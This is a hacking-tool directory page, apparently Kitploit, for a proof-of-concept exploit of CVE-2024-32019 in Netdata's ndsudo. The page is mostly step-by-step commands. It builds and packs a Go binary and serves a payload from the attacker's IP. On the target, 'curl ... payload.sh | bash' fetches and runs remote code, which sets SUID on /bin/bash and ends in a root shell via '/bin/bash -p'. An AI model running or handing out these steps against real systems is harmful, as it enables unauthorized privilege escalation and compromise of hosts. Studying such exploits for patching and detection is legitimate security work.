Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-32019-poc — Netdata ndsudo PoC | Kitploit
Tools/GitHubGitHub/c0deinblack/cve-2024-32019-poc
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubc0deinblack/cve-2024-32019-poc

CVE-2024-32019-poc

Netdata ndsudo PoC

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-32019-poc

Netdata ndsudo PoC

Build the binary:

root@kitploit:~
go build -ldflags "-s -w" -o nvme poc.go
upx nvme

Run the bash script:

root@kitploit:~
bash exploit.sh <YOUR IP>

In target machine run in a writable directory:

root@kitploit:~
curl http://<YOUT IP>:8000/payload.sh | bash

It will automatically download the nvme binary, export the path, run ndsudo and add SUID to /bin/bash. Probably you need to change the ndsudo path in exploit.sh

To escalate privileges just run:

root@kitploit:~
/bin/bash -p

Note:

The exploit is based in https://github.com/AzureADTrent/CVE-2024-32019-POC, when I tested it, I had the error:

root@kitploit:~
execve: Exec format error

That's why I decided to create mine with Go.

Download Tool